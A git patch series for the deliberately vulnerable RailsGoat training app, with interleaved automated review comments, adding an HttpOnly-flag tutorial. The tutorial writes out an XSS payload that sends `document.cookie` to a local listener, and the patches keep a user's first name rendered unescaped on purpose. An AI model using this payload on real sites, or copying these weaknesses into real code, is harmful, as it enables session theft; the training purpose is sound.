From a2d487cbf256b46d566b897a59ceefa2ef956712 Mon Sep 17 00:00:00 2001
From: Al Snow
Date: Tue, 9 Sep 2014 12:59:21 -0400
Subject: [PATCH 1/5] Upgraded libv8 gem
---
 Gemfile.lock | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index b464d0b..667fcf5 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -144,7 +144,7 @@ GEM
 kgio (2.9.2)
 launchy (2.4.2)
 addressable (~> 2.3)
- libv8 (3.16.14.3)
+ libv8 (3.16.14.5)
 listen (2.7.9)
 celluloid (>= 0.15.2)
 rb-fsevent (>= 0.9.3)
From ef2bc20c970528aefca623ab698c6efb47698bc5 Mon Sep 17 00:00:00 2001
From: cktricky
Date: Thu, 11 Sep 2014 11:01:56 -0400
Subject: [PATCH 2/5] working on the httponly tutorial
---
 app/models/user.rb | 4 +-
 app/views/layouts/shared/_header.html.erb | 2 +-
 .../broken_auth_sess/_httponly_flag.html.erb | 75 +++++++++++++++++++
 .../_insecure_compare.html.erb | 2 +-
 app/views/tutorials/broken_auth.html.erb | 5 ++
 5 files changed, 84 insertions(+), 4 deletions(-)
 create mode 100644 app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb
diff --git a/app/models/user.rb b/app/models/user.rb
index 9c5cc7f..23922eb 100755
--- a/app/models/user.rb
+++ b/app/models/user.rb
@@ -62,7 +62,7 @@ class User < ActiveRecord::Base
 return auth
 end
-=begin
+#=begin
 # More secure version, still lacking a decent hashing routine, this is for timing attack prevention
 def self.authenticate(email, password)
 user = find_by_email(email) || User.new(:password => "")
@@ -72,7 +72,7 @@ class User < ActiveRecord::Base
 raise "Incorrect username or password"
 end
 end
-#=end
+=end
 def assign_user_id
 unless @skip_user_id_assign.present? || self.user_id.present?
diff --git a/app/views/layouts/shared/_header.html.erb b/app/views/layouts/shared/_header.html.erb
index 0be9691..b2ee16d 100755
--- a/app/views/layouts/shared/_header.html.erb
+++ b/app/views/layouts/shared/_header.html.erb
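Review bot: Turning `=begin` into `#=begin` makes the block that follows live code, so `class User` gains a second `def self.authenticate(email, password)` while the method whose `return auth`/`end` tail forms the context above (presumably the original `authenticate`) stays in place; Ruby keeps whichever definition comes last and only warns under `-w`, so the superseded body silently becomes dead code. If the timing-attack-resistant version is meant to take over, remove the first definition in the same commit rather than leaving two; both definitions begin and end outside these hunks. The second hunk is rendered here as `-#=end`/`+=end` while the first is `-=begin`/`+#=begin`; if that is what the patch really contains, the file is left with a bare `=end` that Ruby will not parse, so it is worth checking against the actual file.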
@@ -26,7 +26,7 @@
 going on with funny chars and jquery, plus it says safe so I'm guessing nothing bad will happen -->
- Welcome, <%= current_user.first_name.html_safe %>
+ Welcome, <%= current_user.first_name %>
 • <%= button_to "RailsGoat Tutorials", tutorials_path, {:class => "btn btn-primary", :method => "get"}%>
diff --git a/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb b/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb
new file mode 100644
index 0000000..52a13a5
--- /dev/null
+++ b/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb
@@ -0,0 +1,75 @@
+
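Review bot: The HTML comment whose tail `plus it says safe so I'm guessing nothing bad will happen -->` sits on the context line above now describes a call the new side no longer makes, since `.html_safe` was dropped from `Welcome, <%= current_user.first_name %>`. Update or remove that comment so the next reader does not go looking for an escaping bypass that is gone; the comment's opening is outside the hunk. With the call removed, ERB's default output escaping applies to `first_name`, which is what the comment should now say if it is kept.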
    +
    +
+ A2 - Broken Authentication and Session Management - Lack of HttpOnly Flag
+
    +
    +
    +
    +
    + +
    +
+ INSERT DESC
+
    +
    +
    +
    + +
    +
    +

+ By default, Ruby on Rails protects it's cookies with the HttpOnly flag. However, it is possible to disable this security protection and is not recommended. You can disable this protection using the flag highlighted below. This is an insecure and unnecessary change.
+

    +
    +Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_session', httponly: false
    +				
    +
    +
    +
    +
    + +
    +
    +

    Lack of Password Complexity - SOLUTION

+ INSERT SOLUTION
+
    +
    +
    +
    + +
    +
    +

+ INSERT DESC
+

    +
    +
    +
    +
    +
    +
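Review bot: The configuration line in the code sample, `Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_session', httponly: false`, is shown without saying which file it belongs in, so a reader cannot tell where to look for the setting or where to remove it. Add a lead-in naming the file in the same style the `_insecure_compare` partial uses (`Within app/models/user.rb:`), e.g. `Within <path of the session store config file>:` with the real path filled in. The partial also still ships with `INSERT DESC`/`INSERT SOLUTION` placeholders and a `Lack of Password Complexity - SOLUTION` heading copied from another tutorial, so it should not be wired into `broken_auth.html.erb` until those are filled in.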
diff --git a/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb b/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb
index 98cc566..de35813 100644
--- a/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb
+++ b/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb
@@ -67,7 +67,7 @@
    -

    Lack of Password Complexity - SOLUTION

    +

    Insecure Timing Attacks - SOLUTION

    Within app/models/user.rb:

diff --git a/app/views/tutorials/broken_auth.html.erb b/app/views/tutorials/broken_auth.html.erb
index 4953d5b..4b9056c 100755
--- a/app/views/tutorials/broken_auth.html.erb
+++ b/app/views/tutorials/broken_auth.html.erb
@@ -15,6 +15,11 @@
 <%= render :partial => ("layouts/tutorial/broken_auth_sess/insecure_compare")%>
    +
    +
+ <%= render :partial => ("layouts/tutorial/broken_auth_sess/httponly_flag")%>
+
    +
From a50cad0cf395d0fd788cb214f2af5a4a8f2db8de Mon Sep 17 00:00:00 2001
From: cktricky
Date: Thu, 11 Sep 2014 11:11:55 -0400
Subject: [PATCH 3/5] Resolves #133
---
 .../broken_auth_sess/_httponly_flag.html.erb | 28 +++++++++++++++----
 1 file changed, 23 insertions(+), 5 deletions(-)
diff --git a/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb b/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb
index 52a13a5..498a0c6 100644
--- a/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb
+++ b/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb
@@ -16,7 +16,7 @@
- INSERT DESC
+ The HttpOnly flag prevents access to the document.cookie attribute of the DOM via JavaScript. Helpful for limiting the impact of Cross-Site Scripting as it relates to session theft.
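Review bot: `The HttpOnly flag prevents access to the document.cookie attribute of the DOM via JavaScript` slightly overstates the control: HttpOnly keeps script from reading the cookie value, but script already running on the page still acts within the authenticated session, so the flag limits session theft rather than neutralising Cross-Site Scripting. I'd phrase the second sentence as `It limits the impact of Cross-Site Scripting by keeping the session cookie out of reach of injected script; it does not stop that script from acting within the session.` so the tutorial sets the right expectation. The markup enclosing this text starts and ends outside the hunk.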
    @@ -31,7 +31,7 @@

- By default, Ruby on Rails protects it's cookies with the HttpOnly flag. However, it is possible to disable this security protection and is not recommended. You can disable this protection using the flag highlighted below. This is an insecure and unnecessary change.
+ By default, Ruby on Rails protects its' cookies with the HttpOnly flag. However, it is possible to disable this security protection and is not recommended. You can disable this protection using the flag highlighted below. This is an insecure and unnecessary change.

     Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_session', httponly: false
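Review bot: `By default, Ruby on Rails protects its' cookies with the HttpOnly flag` swaps one misspelling for another: the possessive is `its` with no apostrophe, so the line should read `protects its cookies`. The rest of the rewritten sentence reads fine; the paragraph's opening tag is outside the hunk.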
    @@ -49,8 +49,26 @@ Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_sess
               
    -

    Lack of Password Complexity - SOLUTION

- INSERT SOLUTION
+

    Lack of the HttpOnly Flag - ATTACK

    +

+ Navigate to the sign-up page, sign up as a user, but in the first name field, enter:
+

    +					<script>document.location="http://localhost:8000/" + document.cookie </script>
    +				  
    +

+ Additionally, fire up Python's SimpleHTTPServer module using the following command:
+

    +
    +					$ python -m SimpleHTTPServer
    +				  
    +

+ Now authenticate to the application as the user you just created, you'll be redirected, now review the terminal tab that has the python server running. You'll notice that you see a GET request with the user's session in the request path. This means you have now grabbed the user's session via Cross-Site Scripting.
+

    +

    +

    Lack of the HttpOnly Flag - SOLUTION

    +

+ Keep the default configuration "as-is" and do not make this change. If this exists in your code base, remove it.
+
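Review bot: The SOLUTION text, `Keep the default configuration "as-is" and do not make this change`, presents the missing HttpOnly flag as the vulnerability, but the walkthrough above only succeeds because the header renders `first_name` unescaped; HttpOnly is defence in depth that limits what injected script can read, not a fix for the injection itself. I'd add one sentence after it, `HttpOnly only limits the damage; the root cause in this walkthrough is the first name being rendered without escaping, so fix the output encoding as well.`, so readers do not conclude that restoring the flag alone closes the issue. Note also that the walkthrough assumes `.html_safe` on `first_name` in the header partial, which the second patch in this series removed, so as of this commit the steps and the code disagree. The enclosing markup of this section starts and ends outside the hunk.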

    @@ -65,7 +83,7 @@ Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_sess

- INSERT DESC
+ Can JavaScript interact with my session cookie?

From 7e38ac845f72c367c5cada1e7565719291707056 Mon Sep 17 00:00:00 2001
From: cktricky
Date: Thu, 11 Sep 2014 11:13:15 -0400
Subject: [PATCH 4/5] oops, omitted a couple important features/vulnerabilities
---
 app/models/user.rb | 4 ++--
 app/views/layouts/shared/_header.html.erb | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/app/models/user.rb b/app/models/user.rb
index 23922eb..9c5cc7f 100755
--- a/app/models/user.rb
+++ b/app/models/user.rb
@@ -62,7 +62,7 @@ class User < ActiveRecord::Base
 return auth
 end
-#=begin
+=begin
 # More secure version, still lacking a decent hashing routine, this is for timing attack prevention
 def self.authenticate(email, password)
 user = find_by_email(email) || User.new(:password => "")
@@ -72,7 +72,7 @@ class User < ActiveRecord::Base
 raise "Incorrect username or password"
 end
 end
-#=end
+=end
 def assign_user_id
 unless @skip_user_id_assign.present? || self.user_id.present?
diff --git a/app/views/layouts/shared/_header.html.erb b/app/views/layouts/shared/_header.html.erb
index b2ee16d..0be9691 100755
--- a/app/views/layouts/shared/_header.html.erb
+++ b/app/views/layouts/shared/_header.html.erb
@@ -26,7 +26,7 @@
 going on with funny chars and jquery, plus it says safe so I'm guessing nothing bad will happen -->
- Welcome, <%= current_user.first_name %>
+ Welcome, <%= current_user.first_name.html_safe %>
 • <%= button_to "RailsGoat Tutorials", tutorials_path, {:class => "btn btn-primary", :method => "get"}%>
From e78f9554943915ea29c9c3e90f174d6b12532ee8 Mon Sep 17 00:00:00 2001
From: Al Snow
Date: Thu, 11 Sep 2014 19:17:32 -0400
Subject: [PATCH 5/5] Updated 1 gem by rebuilding Gemfile.lock file
---
 Gemfile.lock | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index 667fcf5..f160d6b 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -276,7 +276,7 @@ GEM
 rack (>= 1.0.0)
 thor (0.19.1)
 tilt (1.4.1)
- timers (4.0.0)
+ timers (4.0.1)
 hitimes
 travis-lint (2.0.0)
 json
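Review bot: The new side restores `.html_safe` on `Welcome, <%= current_user.first_name.html_safe %>`, so a user-controlled field is again rendered without escaping, and nothing in the template records that this is deliberate, which is how the previous patch in this series came to remove it as a cleanup. Since the HttpOnly tutorial partial added earlier in the series depends on this behaviour, mark the intent with a non-rendering ERB comment next to the line, e.g. `<%# Intentional RailsGoat weakness: first_name is rendered unescaped for the broken_auth_sess/httponly_flag tutorial; keep in sync with it %>`. The same goes for the `=begin`/`=end` re-commenting in `app/models/user.rb` earlier in this patch: the `# More secure version` comment says what the block is but not that it is disabled on purpose, so a one-line `# intentionally disabled; the version above is what the insecure-compare tutorial exercises` would stop the next reader toggling it again. The rest of the header markup is outside the hunk.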